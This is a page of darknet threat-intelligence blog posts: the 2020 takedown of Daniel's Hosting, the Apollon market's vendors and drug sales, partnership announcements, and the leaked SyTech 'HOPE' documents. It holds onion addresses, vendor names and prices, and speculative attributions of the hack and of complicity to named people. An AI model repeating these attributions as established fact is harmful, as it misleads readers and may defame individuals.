Less than 5 minutes after the chatroom went offline, a single post appeared on the drama and spam-filled Tor hidden service, DeepPaste, with the hackers blaming staff pedophiles and Syntax directly for the attack against Daniel’s services. The hackers also included a link to another external hidden service on Tor with a list of all the filters from the admin panel in the anonymous chatroom. It is rumored staff moderators used the extensive list of filters, consisting of mostly keywords and URLs linked to illegal subject matter, for auto-kicking guests posting banned content. 

The reason for posting this – along with their final statement – is unknown and the service containing the filters is no longer online.

Screenshot of a posting on DeepPaste, that broadcasts that Syntax and others are responsible for the takedown of Daniel’s Hosting

A couple of hours after the hack, user @meerkat posted to another Le-Chat on Tor that he had confirmed with Daniel via his friend Adriane that his administrator password had been simply brute forced. Given @daniel’s limited involvement, he expressed skepticism the chatroom would ever return.

Source: Black Hat Chat on Tor

The Hacker @null and the Accomplice @Pickle

03-10 04:07:28 – Pickle – Hmm, lots of people just seem to get what they deserve…
03-10 04:19:45 – Pickle – They’re all against you.
03-10 04:20:10 – Pickle – They all must die…t

— Excerpt from Daniel’s Chatroom Transcript, March 10, 2020

Little is known about @null or @Pickle in the Daniel’s Chat community, as the nicknames were not previously registered as members on the chat. While @null entertained questions from @Dolly/@Syntax about how the attack was conducted, @Pickle made only three statements over the last 30 minutes that the chat was online.

Using Vision, DarkOwl analysts uncovered a lengthy history for both monikers (null and Pickle) in the underground community known as Kiwi Farms.

Kiwi Farms, formerly known as CWCki, has been on the surface web since 2013 and archived by DarkOwl on Tor since October 2017. It was set up by Joshua “Null” Moon as an exclusive image board for trolling and harassing an autistic transgender web comic artist, but has since evolved into a dedicated discussion board for “lolcows,” including stalking and doxing of public and internet figures.

Screenshot of the user profile “Null” on Kiwi Farms forum


The content on Kiwi Farms is consistent with typical chanboard-like discussions. There are recurring anti-pedophilia threads and general disdain for FBI honey-pots. There are very few technology- or hacking-focused threads on the Kiwi Farms forum.

Source: Kiwi Farms forum


In November 2019, darknet hackers targeted Kiwi Farms leaking their member and conversations database on the popular forum, RaidForums, possibly giving the staff and members of the community at Kiwi Farms justification for a cyber-based retaliation.

Source: DarkOwl Vision MD5 - 2e960aacf263ec00196320254f94ca1f


Despite the leak in 2019, the evidence connecting Kiwi Farms to the hack of Daniel’s earlier this year is extremely weak and circumstantial. Kiwi Farms has over 50,000 registered users and several prominent members include “Pickle” in the moniker, e.g. long-time member “Pickle Inspector,” but DarkOwl analysts were unable to connect these, nor their administrator “Null”, to the hackers of Winzen’s services.

Unfortunately, “null” is also a common moniker observed in recent years on the popular darknet cybersecurity forum Torum. In late 2018, “null” posted a course on social engineering, written as CURSE OF ENG.SOCL.

The thread was not well-received, nor did the member “null” post that frequently, having less than a dozen posts on the forum since their registration in September 2018.

 
Source: DarkOwl Vision MD5: 12a9f3ba67f2a6be2c19b56e7a4f58cc


Did GhostSec send a warning a week prior?

On March 3rd 2020, a guest by the name of @Sebastian entered Daniel’s Chat and stated “GhostSec is watching you,” adding that they had taken control of Daniel’s Discord servers – servers that members in the chat didn’t know he even had.

Shortly before getting kicked from the room, @Sebastian posted a fingerprint and claimed Daniel was compromised while accessing child pornographic content called, Tiny Voices. Sebastian is also the moniker and name of the leader of the anti-pedophilia hacking group formerly known as Ghost Security (#GhostSec). Sebastian Dante Alexander, who uses the Twitter handle, @SebastianDant13, is a vigilante hacker known for tracking and de-anonymizing criminals who harm children.

 

03-03 19:08:15 – Sebastian – Daniel
03-03 19:08:44 – Sebastian – GhostSec is watching you
03-03 19:10:16 – Sebastian – Daniel I took ur discord servers and we are the ones eating these nodes
03-03 19:16:20 – Sebastian – 0d 6a a4 e8 45 b7 51 09 d5 c2 d4 39 fe 1f 69 5f 15 72 04 8c 40 48 74 dc b4 4f a1 ba ed e7 58 15
03-03 19:16:38 – Sebastian – That’s his fingerprint we are tracking
03-03 19:16:44 – Dusted – hm?
03-03 19:17:12 – Sebastian – We have him for this pedo shit in Tiny Voices fucking Daniel the pedo left his fingerprint
03-03 19:17:32 – Sebastian – Uh oh
03-03 19:17:51 – Sebastian has been kicked.

— Excerpt from Daniel’s Chatroom Transcript, March 03, 2020
 

An organized hacking collective like GhostSec definitely has the capabilities and motivation to take down Winzen’s servers, especially if there was questionable content hosted and shared, but the group has not published any declaration or claim of responsibility for the hack, like they have with other groups and individuals they’ve targeted in the past.   

Daniel’s response

As soon as Daniel was alerted to the hack, he posted a notification to his main website confirming what was suspected. The hackers deleted all databases related to his hosting platform and all users should consider their data leaked and passwords compromised. 

He further stated the remaining 390GB of data from the websites he hosted would only be available until the 25th of March and recommended his customers use Freedom Hosting Reloaded or OneHost as he had no intention of restarting his hosting project.

Screenshot of Daniel’s Hosting landing page immediately post hack with public announcement


Daniel followed up with an update on March 11th 2020, giving users more details on archiving what was left of their website data. Winzen referred to the flood of messages encouraging him to keep going with the hosting service, but Daniel stated that keeping his servers clean from scammers took time from development and projects he enjoyed. He left the option open, months down the road, but not until he found time to improve the current platform.

Response from @daniel regarding server status on March 11, 2020


No database backups

Speaking of server setup, strangely, Winzen did not maintain any archives of the SQL databases he hosted, as evidenced by the data loss, nor were backups of the deleted databases available when he was hacked previously in late 2018. Many darknet users have expressed increasing skepticism, suggesting Daniel was not as committed to his darknet projects as he would have liked everyone to believe. After the most recent database breach, one anonymous user suggested that @null’s reference to the chatroom being a honey-pot was legitimate, adding suspicion over a server upgrade or move that occurred only weeks before the most recent attack.

Those who suspect that Daniel’s chatroom was actually a honey pot surmise that Daniel didn’t maintain backups of his data because the servers were being monitored (and probably managed) by international or German law officials. This was supported by the fact that a rule change regarding sharing any pornographic content occurred in 2018, around the same time that Daniel was hacked and his databases disappeared.

There have been numerous pastes circulated around the darknet in the last year claiming many of the members, including @Syntax were Law Enforcement.

Archived screenshot of Daniel’s Onion Link List in June 2019


Daniel’s link list is lost

While the takedown of Daniel’s Chat and Hosting has received significant attention, another item that was compromised during this time was Daniel’s Onion Link List.

Winzen maintained a seed list of Tor hidden services, along with a status indicator and topical classifier that was helpful for those exploring the darknet regularly. This list of links was referred to by hundreds of other sites across Tor.

Now, Daniel’s Onion link list returns a 504 Gateway Time-Out error.

DarkOwl analytical look

After the last hack in November 2018, it took Winzen almost two months to re-deploy his hosting services. On January 6th 2019, Winzen posted a happy new year and hosting message indicating his hosting services were back online.

Archived screenshot from Daniel’s Hosting in January 2019


By January 10th, 2019, a mixture of over 1,400 darknet domains and subdomains appeared operational. This initial count of domains was determined not only by the domain names themselves, but by careful review of the content of sites hosted by Winzen prior to and after the November 2018 hack.

Notably, DarkOwl Vision data shows an increase of over 7,600 domains affiliated with the hosting provider over the course of the 2019 calendar year.

Graph depicting number of domains tagged as Daniel’s Hosting services via DarkOwl Vision


In DarkOwl’s quantitative Map The Dark internal reports, domains are topically tagged as being associated with Daniel’s Hosting if (1) the domain URL was discovered on the public “List of Hosted Sites” on Daniel’s Hosting, or (2) the website contained the phrase “Site Hosted by Daniel’s Hosting,” as has been observed with most newly published darknet hidden services. As of March 9th 2020, DarkOwl had observed 9,006 domains or sub-domains affiliated with Daniel’s Hosting, 7,555 of which were recorded as online during the first two weeks of March 2020.

Update on Daniel’s landing page on March 15, 2020


On March 15th 2020, Winzen once again updated his landing page to state that all hidden services were offline to allow migration of his users’ hidden service URLs to a different darknet hosting provider. By April 1st 2020, DarkOwl had identified approximately 1,200 hidden services topically tagged to Daniel’s Hosting as back (or still) online.

DarkOwl analysts observed that many of the 1,200 hidden services consist of active sub-domains on Winzen’s historical V2 onion URL (tt3j2x4k5ycaa5zt[.]onion). Most of the subdomains on the V2 onion URL first came online in June 2017, and have been consistently active to date. Many of these include offensive keywords, such as, pedohosting.tt3j2x4k5ycaa5zt[.]onion, and nazism.tt3j2x4k5ycaa5zt[.]onion. These are just a few examples of several dozen others that include similarly banned topics and offensive keywords.

These V2 domains simply redirect to the V3 Tor landing page, and have never had web content available to publicly collect. Nevertheless, several of these subdomains contain illicit keywords that suggest Winzen might have been complicit in hosting illegal content, despite his rules and policies against such content.

Interestingly, there are also another 43 subdomains starting with the string “password” and an additional 23 with the phrase “freedomhosting” or “freedomhostingnode” suggesting at one point, Winzen collaborated with long-time controversial darknet hosting provider, Freedom Hosting. Are these the “nodes” GhostSec was referring to on March 3rd?
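The two tagging rules described above, plus the kind of subdomain prefix count just applied to the V2 onion, as an added Python example that is not DarkOwl’s own code. The hosted-sites list and the crawled page bodies are constructed inputs, not real Vision data.

```python
"""Added example, not DarkOwl's code: the two tagging rules described above
for attributing a hidden service to Daniel's Hosting, followed by the kind
of subdomain prefix review the post applies to the V2 onion. Every record
below is constructed; the hosted-sites list and page bodies are assumed
inputs, not real crawl data."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Phrase seen on most newly published services hosted by Winzen (from the post).
HOSTED_BY_PHRASE = "site hosted by daniel's hosting"
# Winzen's historical V2 onion, written on the page as tt3j2x4k5ycaa5zt[.]onion.
V2_ONION = "tt3j2x4k5ycaa5zt.onion"
# V2 addresses are 16 base32 characters, V3 addresses are 56.
ONION_RE = re.compile(r"^(?:[a-z2-7]{16}|[a-z2-7]{56})\.onion$")

def onion_host(url):
    """Lower-cased host of a URL; '[.]' de-fanging is undone first so that
    urlsplit does not choke on the square brackets."""
    url = url.replace("[.]", ".")
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()

def split_onion(host):
    """Split 'a.b.<onion>.onion' into ('a.b', '<onion>.onion'); a host with
    no recognisable onion suffix is returned unchanged as the base."""
    labels = host.split(".")
    for i in range(len(labels) - 1):
        base = ".".join(labels[i:])
        if ONION_RE.match(base):
            return ".".join(labels[:i]), base
    return "", host

def tag_daniels_hosting(record, hosted_list):
    """Return the tagging rules that fire for one crawled page:
    'hosted_list'   - rule 1, host appears on the public List of Hosted Sites
    'footer_phrase' - rule 2, body contains the Site Hosted by Daniel's Hosting phrase
    An empty tuple means the page is not attributed to Daniel's Hosting."""
    reasons = []
    if onion_host(record["url"]) in hosted_list:
        reasons.append("hosted_list")
    body = record.get("body", "").replace("\u2019", "'").lower()
    if HOSTED_BY_PHRASE in body:
        reasons.append("footer_phrase")
    return tuple(reasons)

def subdomain_prefix_counts(hosts, base_onion, prefixes):
    """Count subdomains of base_onion whose label directly below the onion
    starts with one of the given prefixes (e.g. 'password', 'freedomhosting')."""
    counts = Counter()
    for host in hosts:
        sub, base = split_onion(host)
        if base != base_onion or not sub:
            continue
        first_label = sub.split(".")[-1]
        for prefix in prefixes:
            if first_label.startswith(prefix):
                counts[prefix] += 1
    return counts

def analyse(records, hosted_list, base_onion=V2_ONION,
            prefixes=("password", "freedomhosting")):
    """Tag every record and summarise the tagged subdomains of base_onion."""
    tagged = {}
    for record in records:
        reasons = tag_daniels_hosting(record, hosted_list)
        if reasons:
            tagged[onion_host(record["url"])] = reasons
    return {"tagged": tagged,
            "prefix_counts": subdomain_prefix_counts(tagged, base_onion, prefixes)}

# Constructed sample data: a made-up hosted-sites list and six crawled pages.
HOSTED_LIST = {
    "abcdefghijklmnop.onion",                       # constructed V2 address
    "password1.tt3j2x4k5ycaa5zt.onion",
    "freedomhostingnode3.tt3j2x4k5ycaa5zt.onion",
}
SAMPLE_RECORDS = [
    {"url": "http://abcdefghijklmnop.onion/", "body": "<p>Site Hosted by Daniel\u2019s Hosting</p>"},
    {"url": "http://password1.tt3j2x4k5ycaa5zt[.]onion/", "body": ""},
    {"url": "password2.tt3j2x4k5ycaa5zt.onion", "body": "site hosted by daniel's hosting"},
    {"url": "http://freedomhostingnode3.tt3j2x4k5ycaa5zt.onion/", "body": "<h1>node</h1>"},
    {"url": "http://zzzzzzzzzzzzzzzz.onion/", "body": "unrelated service"},
    {"url": "http://password9.zzzzzzzzzzzzzzzz.onion/", "body": "Site Hosted by Daniel's Hosting"},
]

if __name__ == "__main__":
    result = analyse(SAMPLE_RECORDS, HOSTED_LIST)
    for host, reasons in sorted(result["tagged"].items()):
        print(f"{host:45} {', '.join(reasons)}")
    print(dict(result["prefix_counts"]))  # {'password': 2, 'freedomhosting': 1}
```

Note that the last sample record is tagged but not counted, because its base onion is not the V2 address under review.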

Currently, the V2 URL redirects to Daniel Hosting’s V3 URL, which Winzen adopted after the November 2018 hack – presumably for enhanced security. Both domains have been referenced for his SMTP email domain by Winzen on his contact page. The Bitcoin addresses listed on Winzen’s surface web mirror, danwin1210.me, and the Tor hidden service are different, but both have had numerous transactions since the hack occurred on March 10th, 2020.

The darknet will carry on

Despite Winzen’s encouragement for his users to migrate their existing hidden services and URLs to other darknet hosting providers, most of the services didn’t bother or adopted new URLs. DarkOwl analysts reviewed over 5,000 URLs associated with Daniel’s Hosting since the first of the year and found that fewer than two dozen had migrated and retained their URLs as of early April 2020.

A long-time darknet Twitter-like social network called Atlayo (atlayofke5rqhsma[.]onion) is back online and operating using its previous URL, and it has long been rumored that Daniel was once a key moderator and administrator for this service.

 
Screenshot of current Atlayo sub-landing page


 

Security concerns over the once popular PHP-based LE-Chat platforms have more users migrating to IRC over Tor proxy, while those with hosting resources are offering up their web servers for hosting content in the interim. Users capable of web development have set up even more hidden services than they had while relying on Winzen alone, and clones of Daniel’s home website are being advertised to ostensibly create a sense of familiarity and security.

One such example, OnionCommunity, online since the fall of 2019, has revamped with a layout shockingly similar to Winzen’s. In addition to a chat (IRC), online link list and test, OnionCommunity also advertises social media, market and cloud services that are in development.

Screenshot of page on OnionCommunity that is very similar to Winzen’s former layout


While it took several weeks for users of Daniel’s services to recover what data was available and to figure out where to congregate and how to communicate, the community seems more resolved than ever to continue with or without Daniel’s support, and the darknet itself continued to grow throughout the second half of March, while Winzen was offline.

In fact, since March 11th 2020, DarkOwl has observed an average growth of 387 new domains per day across the entire darknet.

Stay tuned for more updates as we continue to track darknet trends and post updates on our blog.

DarkOwl Announces Partnership with Pure Security

Pure Security and DarkOwl LLC Announce Cybersecurity Partnership

Denver, CO – April 15, 2020 – DarkOwl LLC, a Denver-based cybersecurity company specializing in darknet data, is proud to announce a new partnership with the leading Australian full-service cybersecurity firm, Pure Security.

Pure Security uses a mixture of intelligence gathering methods, tools and expert knowledge to detect a range of findings not detected by traditional scanners and penetration testing. Pure Security then provides its clients with an actionable report and a suggested course of action to remediate against the findings.

DarkOwl will provide Pure Security access to its extensive database of darknet data and serve as a critical tool for the company to monitor their client’s footprint and exposure on the darknet.

“Pure Security takes a relentless approach to cybersecurity; from endpoint to managed SIEM to threat hunting. They are a powerhouse and have some of the largest companies in Australia as clients. And as DarkOwl is the world’s largest darknet data provider, we are thrilled to be part of their vast toolkit,” said Mark Turnage, CEO of DarkOwl.

Kurt Hansen, CEO at Pure Security says “Pure Security Pty Ltd is delighted to be partnering with DarkOwl as a best of breed provider to strengthen our ongoing program delivering Intelligence Services to our clients. With an ever increasing need to understand the evolving threat landscape, our clients required a more continuous cyber intelligence monitoring.  Our Intelligence consultants evaluated over a dozen vendors and recommended DarkOwl as a vendor that best matched our clients’ needs and the interlock of our consulting and managed service offerings.  We are extremely pleased to be partnering with DarkOwl to assist in achieving our primary mission of keeping our clients safe in an online world.”

For more information on DarkOwl, please visit www.darkowl.com; for more information on Pure Security, please visit www.pure.security


About Pure Security

Pure Security is a leading provider of IT Security Services, with a passion for pushing the boundaries to deliver innovative, strategic and offensive security solutions across Australia and the globe. Formerly Pure Hacking, HackLabs, Securus Global & Certitude – Pure Security has united the various security specialties to deliver as a single provider.  In December 2019 Pure Security joined with Tesserent (ASX:TNT) – the largest ASX listed cybersecurity company in Australia, to expand their services to include 24/7/365 managed security services.  With over 130 consultants, 5 Offices and in excess of 700 clients, Pure Security brings passion, experience and insight into all their engagements.

 

About DarkOwl

DarkOwl was founded in 2016 with the mission of collecting the broadest dataset of darknet content available in the cyber-defense industry and making that data both accessible and valuable to its clients. By empowering its customers to have eyes on the darknet, DarkOwl enables organizations to fully understand their security posture, detect potential breaches, mitigate them quickly, and investigate even the furthest and most obscure reaches of the internet.

 

Apollon Exit Scam: Analytical Market Review

Overview

On the 31st of January, members of the dark web community began warning users of the imminent exit scam of Apollon cryptomarket. Apollon Market, established in March 2018, has developed into a market with credible reputation in recent months as other key longtime markets have disappeared or been seized by authorities.

 
Landing Page for Apollon Market  on Tor Browser Bundle After Login


 

After reviewing the archived market data captured by DarkOwl Vision, our analysts assess with high confidence that Apollon Market experienced a positively skewed distribution of activity driven by a surge of vendors appearing on the market in late 2019.

Total Listings per Category offered on Apollon Market as Defined by Market Administrators


This evidence suggests that law enforcement efforts to curb criminal behavior on dark web markets through heavy DDoS and subsequent seizure increase vendor sales for those vendors who are highly mobile across marketplaces.

Furthermore, addictive psychoactive stimulants, such as methamphetamine and cocaine, appeared frequently in not only the top number of listings sold and offered, but also in revenue. This suggests a substantial rise in popularity on the dark web marketplaces for these goods (as compared to Baravalle, Lopez and Lee’s Mining the Dark Web).

Apollon Market is largely a drug market with self-advertised market data from their landing page, suggesting that drugs comprise over 75% of the goods on offer. DarkOwl Analysts reviewed these to uncover that many of the advertised listings are duplicative and some categorized incorrectly.

Despite this, on average, there are significantly more drugs offered than digital goods, but some vendors observed considerably larger revenue and return on investment in the digital goods market segment.

 

Quantitative Findings

  • Since 2018, DarkOwl Vision archived 35,028 unique listings across 1,761 vendor accounts on Apollon, comprising a mixture of sales categories including drugs, digital goods, fraud, and malware.

  • DarkOwl analysts assess the total value of the market is $10,986,561 USD based on total sales reported and the value of the listings offered at the current exchange rate from Bitcoin (BTC) to USD or Monero (XMR) to USD.

  • The average revenue generated per vendor is $6,249 USD while the median revenue per vendor is $933.25 USD, suggesting that the distribution of the revenue across the market is heavily skewed, positively.

  • Despite this positive skew, there appears to be an outlying segment of particularly high-revenue vendors with much higher reported revenue than the rest of the vendors in the market.

  • This is supported by the fact the top 10 vendors in sales revenue amassed an estimated $1.6 Million USD in total sales, while 14% of all vendors reported no sales at any point during their tenure on the market. Some non-active vendor accounts could easily be used for test purposes or as a law enforcement honey pot. 

Countries of origin

Vendor Advertisements by Country of Origin

Of the 35,028 unique listings, many do not specify the country of origin. Some merely state their location as “Worldwide,” suggesting that the vendor is potentially a network of suppliers around the world, the good can be delivered digitally, or the vendor is willing to assume the heightened risk of international shipping.

Of the 75% of listings that do provide a country of origin, 57% of the vendors claimed their goods or services originated within the USA, United Kingdom, Germany, and the Netherlands. 4.8% of them kept the country of origin generic as “Europe,” and others specified unlikely locations such as the Pitcairn and Wallis and Futuna Islands in the South Pacific.

Listings

Drugs comprise the largest categorical segment of Apollon Market, with over 44,000 total listings, although some of these are duplicative [see Analyst’s Note below].

Of the drug listings, Cannabis, Stimulants, and Ecstasy comprise over 50% of those advertisements. A review of the total sales and revenue revealed that addictive, psychoactive stimulants were in the highest demand from this market, and the listing with the largest number of reported sales is Colombian Cocaine.

Based on current currency conversion rates for BTC to USD, the listing with the highest estimated revenue is a private “VIP” Digital Good offered by long-time dark web vendor, Gfellas, while the remaining 4 top revenue-generating listings were all drug related.

Analyst’s Note: Bear in mind that since the exit scam began, the market administration has been deactivating older listings, erroneously categorizing many advertisements across multiple categories, and manipulating vendor login data, prompting the need for a more rigorous review of the listing titles and descriptions using machine learning at a later time.   


A Positively skewed distribution of revenue

Analysis indicates that the average price for listings (with at least one sale) was anywhere from four to eight times the median listing price on Apollon. The observed gap between the two grew for vendors with larger numbers of units reported sold.

Top Listings Sold and their Estimated Revenue


 
 

Apollon Market’s Evolution over Time

Spikes in Apollon vendor registrations following other major marketplace closures


In comparison to other dark web cryptomarkets’ longevity before exit scam or seizure, Apollon had a considerable run, trading for almost two years with minimal downtime. During the first few months, little activity occurred on the market, but the market showed considerable pickup in total number of vendors trading after other key markets went offline.

Market closures drive traffic

In July 2019, when Nightmare Market exit-scammed, DarkOwl observed that the total number of vendors on Apollon nearly doubled.

In October 2019, Berlusconi was seized by the Italian authorities, followed shortly by Cryptonia, which disappeared in late November 2019. After Berlusconi’s seizure, several vendors used their credibility from years of trading on those markets as imported feedback to drive a high volume of sales on Apollon.

Apollon experienced the largest number of new vendor registrations in December 2019, post Cryptonia, at 390 new vendors.


“whitebeer”

Vendor “whitebeer” was found to have a significant number of listings and also a considerable number of sales, appearing in the top three of each list analyzed. The total value of their sales, though, was only $48K, 21% of the revenue of the market’s top vendor by revenue, magicblue.

Key Vendors

The top ten vendors by total number of listings, along with their corresponding number of total sales, are provided in the chart below. The top ten vendors by volume of offers do not overlap with those grossing the highest revenue or having the highest total number of sales.

 
 
Top 10 Vendors on Apollon by Total Number of Listings


 
 
 

The top 3 vendors in revenue comprise 6% of all the revenue of Apollon Market while the top 10 vendors accumulated over $1.6 Million USD in total sales. The top vendors with the highest revenue trafficked drugs, suggesting that dealing in drugs yields higher gross income on dark web markets than digital goods or fraud services, such as fake passports.

 
Top 10 Vendors on Apollon According to Reported Market Revenue


 

The first market vendors

Despite the fact that the market’s reported established date is March 2018, 45 vendors appeared on the market on 10 July 2018. DarkOwl assumes that during the first three months the market was likely in a testing phase and did not have any active trading occurring. Of those vendors appearing on 10 July 2018, the vendors with the largest total sales were Dr.White3, g0ldenboy, HeinekenExpress, usagear, stanovo1ONLY, SUDO, and NUTSPRACKER; however, none of these vendors appear in the top 20 revenue-generating vendors list at the time we conducted analysis.

Vendors with the highest revenue

Based on historical market data and the current vendor profiles, the vendor using the moniker magicblue migrated over to Apollon in mid-September 2019, shortly before the announcement of Berlusconi’s seizure by Italian authorities. The vendor brought with them significant positive feedback and credibility from their years trading on Berlusconi. Shipping their orders from Germany, magicblue’s principal drug market is ecstasy and LSD. Their highest value listing on Apollon Market is 250g of A+++ MDMA “top quality” at $812 USD per order.

Vendor magicblue’s Apollon profile and MDMA Listing



Conclusion

DarkOwl Analysts’ analytical survey into Apollon Market yielded insight into the evolution of the cryptomarket in vendor registrations and listings, countries of origin and shipping, and general revenue generating activity. At time of writing, the market value is at $10.9 Million USD (based on an exchange rate of 1 BTC = $10,222.7 USD, the value at time of analysis) with addictive, psychoactive stimulants as the most popular, highest revenue generating category of drugs offered on the market.

Overall, Apollon Market shows a positively skewed distribution of revenue, with the surge in vendor registrations and activity after Nightmare, Berlusconi, and Cryptonia disappeared either due to exit scam or market seizure. Vendors brought with them credibility and positive customer feedback and immediately began trafficking their goods and earning revenue. Like the Hydra of Greek mythology, concerted efforts by law enforcement to remove drug trafficking on the dark web merely strengthen the resolve of the community, and drug vendors continue to be highly mobile and attain uninterrupted success on emerging markets.

DarkOwl LLC and CyberQ Group Announce Strategic Partnership

Denver, CO – February 4, 2020 – DarkOwl LLC, a Denver-based cybersecurity company specializing in darknet data, is proud to announce a new partnership with CyberQ Group.

CyberQ Group monitors and analyzes darknet communities on behalf of their clients, relaying information about attacks, threats and evidence of exfiltrated data. Due to the complex and hidden nature of many of these sources, automated tools are a must for effective analysis and archiving of the communication that occurs. Enter DarkOwl, which automatically, anonymously and continuously collects, indexes and ranks actionable data from the darknet 24/7/365.

CyberQ Group CEO, Chris Woods, stated: “As an international award-winning security services provider, we have many clients with sophisticated requirements. We are always looking for revolutionary security services and pushing for further insights into the darknet. Many cybercriminals communicate, plan and share their exploits across this darknet creating a community of attackers hidden from the rest of the world. Our partnership with DarkOwl will allow us to provide our clients with even deeper insights into the threatening nature of the darknet.”

The two companies joined forces to provide CyberQ clients with a deeper insight into the darknet. Along with many different data points Dark Owl supports two main services for CyberQ Group:

● Continuous Breach Detection Service
● Human Reconnaissance

“We are so pleased to be working with CyberQ Group, they are a well reputed, globally recognized firm. We will work closely with them to provide a more detailed and enriched view on the growing underbelly of the darknet, giving their clients additional confidence that they will be notified and prepared for attacks,” said Mark Turnage, CEO of DarkOwl.

 

About CyberQ

CyberQ Group is an award-winning UK-based cyber security services provider with a global reach, having offices in Europe, the US and Asia. The core team consists of highly experienced cyber and risk professionals who are experts in the subject matter, assisting clients to select the right mix of IT security solutions and services.

 

About DarkOwl

DarkOwl was founded in 2016 with the mission of collecting the broadest dataset of darknet content available in the cyber-defense industry and making that data both accessible and valuable to its clients. By empowering its customers to have eyes on the darknet, DarkOwl enables organizations to fully understand their security posture, detect potential breaches, mitigate them quickly, and investigate even the furthest and most obscure reaches of the internet.

Project HOPE Suggests No Hope for Internet Freedom in Russia

In July of 2019, 7.5 TB worth of documents that were stolen from a Russian FSB contractor known as SyTech were published on the darknet by the hacker group 0v1ru$. Included in the documents is a project known as “HOPE,” which contains contents focused on how Russia intends to control the flow of information within and outside of their borders. While the notion and development of nation-wide intranets that exist in isolation from the global internet at the behest of nation-state authorities is nothing new (and in fact it has become increasingly common), it remains noteworthy – largely due to its association with politically oppressive regimes.

After discovering the leaked SyTech documents on DarkOwl Vision (pictured below), our analysts decided to take a closer look at project HOPE due to its relevancy to decentralized internets (including darknets). Upon conducting this analysis, DarkOwl researchers determined that Russia has been developing some of these plans as far back as 2012 and have concluded that it is very likely that HOPE was the foundation for Russia’s new Sovereign Internet Law, which was recently enacted on November 1st, 2019.

Screenshot from DarkOwl Vision showing the SyTech FSB leak freely available on the dark web


The SyTech leak

WHO IS SYTECH?

SyTech was a Russian Federal Security Service (a.k.a. the FSB, the successor agency to the KGB) contractor registered in Moscow that primarily focused on electronic and signals intelligence research. Publicly disclosed customers of the FSB include the national satellite communications operator JSC RT Komm.ru and the analytical center of the judicial department under the Supreme Court of Russia. Other non-public projects were commissioned by military unit no. 71330, which is believed to be part of the 16th Directorate of the FSB – who were accused of sending files with spyware to Ukrainian military and intelligence agencies in March 2015. Ironically, SyTech is also located in the same building the 16th Directorate of the KGB of the USSR previously occupied. Their 2018 public contract value was 40 million rubles, or $622,631 USD.

SYTECH HACKED


On July 13, 2019, SyTech suffered what BBC Russia called “possibly the largest data leak in the history of Russian intelligence services” when a group of hackers identified as 0v1ru$ gained access to an active directory server, stole 7.5TB of data, and defaced their webpage with a “yoba-face” (pictured to the right).

Though the image was first posted to 4chan in 2008, it is now most prominently associated with this breach, as evidenced by the spike on Google Trends on the date the hack was published. Analysis of screenshots posted by 0v1ru$ suggests that the tools used to gain access were ticketer.py, PSExec, and proxychains.

The leaked data includes 20 non-public IT projects ordered by Russian special services and departments. 0v1ru$ copied the data, deleted it from SyTech servers according to Twitter screenshots (pictured), and shared the documents with Digital Revolution, a separate (to our knowledge) hacking group who successfully breached Kvant Research Institute in 2018. Digital Revolution shared the documents with journalists, published screenshots of information on their Twitter – while mocking Russian officials – and the documents became widely available across the darknet.

Screenshots posted on Twitter by 0v1ru$ depicting SyTech servers before (above) and after (below) the hack



In the aftermath of these events, 0v1ru$’s Twitter account was deleted, and there has been no word from them since the day of the hack. It is unknown if they deleted their Twitter account or if Twitter removed the account. Their motive is unclear, though it seems the group was small in membership. Digital Revolution published a written piece encouraging dissent against Russian authorities in the wake of these documents in early August 2019, and have been silent since. SyTech’s website has been offline since the defacement and no official statement regarding the hack or the future of SyTech was published. It is unclear if SyTech still exists, has been restructured, or dissolved after the leak.

There was no comment from the FSB, though BBC Russia reports no state secrets were leaked. Some have noted that this is another example of contractors being the weakest link in maintaining secrecy during research and development. 

PROJECT HOPE

Though media widely reported on the SyTech hack itself, very few individuals or media outlets have examined the contents of the leaked documents. The level of detail, total amount of information, and potentially compromising information is not apparent from reading currently published reports; in most cases, a brief summary of a handful of the 20 projects is provided, and often, these summaries are not in English. DarkOwl analysts have obtained these documents and conducted analysis to: 

1) Examine the extent of leaked information – were only project summaries leaked, or entire proprietary technical plans?

2) Examine the impact of leaked information – did this leak impact or result in any legal or social issues in the future?

3) Examine the utility in analyzing leaked information – do the resources expended to acquire and analyze these documents produce actionable intel, open further lines of inquiry, or increase our knowledge base surrounding these issues?

To accomplish these goals, DarkOwl analysts examined one of the twenty leaked projects: надежда, or Nadezhda, which translates in English to HOPE.

It is apparent that HOPE’s main directive was to develop a method of disconnecting Russia from the global internet while allowing information to still travel within Russia; in other words, they sought to develop their own nation-wide intranet. Purportedly, this would aid in protection from a foreign cyberattack – allowing Russian authorities to theoretically “unplug” Russia from the global internet to halt foreign attacks – if the technology developed via this project proved successful.

This work was carried out between April 1, 2013 and October 31, 2014 and was funded by Russia’s military unit no. 71330.

Once extracted, it was discovered that, unsurprisingly, the entire HOPE folder was in Russian. The folder contained 5 Microsoft Word documents, and a PowerPoint presentation. The bulk of the information from the documents was translated via Google Translate, though Russian translators assisted in the interpretation of potentially inaccurate or mistranslated words. One document in the leak indicates that it is likely all of these documents are components of a larger “Scientific and Technical Report” on the HOPE project, totaling 519 pages, 82 figures, 201 tables, 110 literature sources, and 7 appendices.

A CLOSER LOOK AT THE CONTENT OF THE DOCUMENTS

The SyTech-developed PowerPoint presentation appears to be a summary of the research and development conducted during the HOPE project. It is likely this was created near the end of the project in 2014 and presented to military unit no. 71330. It summarizes the work completed by SyTech, but also names and summarizes the work done by other collaborators on the HOPE project. According to this, the collaborators of HOPE are:

  • SyTech, who primarily focused on the visualization and analysis of cross-border routes for Internet traffic

  • The RZNF Federal State Unitary Enterprise, who worked on a project codenamed “Nadezhda-T”, aimed at monitoring and filtering traffic

  • Institute for Security and Information Analysis, responsible for compiling the work done on HOPE and testing it and training future users

The presentation also lists the sources of information they used, which are primarily in English and are publicly available. The results indicated success in achieving their research goals at a small scale but raise concerns about scalability.

The Word documents are components of a larger “Scientific and Technical Report” on the HOPE project, written at various stages in the project. One of the final documents suggests that both interim and final reports were produced, thus there is some degree of overlap in the information included in these documents.

The first document is only 2 pages and seems to have been created at the genesis of the HOPE project. It was likely created in November or December of 2012 and states a generic goal of “studying the principles of cross border routing on the internet”. It also states goals of examining vulnerabilities in TCP and Border Gateway Protocol (BGP), routing traffic through trusted government nodes, and the storage and analysis of traffic through these nodes.

All other documents are components of the Scientific and Technical Report at various stages in development. Two of these documents are highly technical examinations of topics such as traffic routing tests, BGP tests, and development of special visualization software.

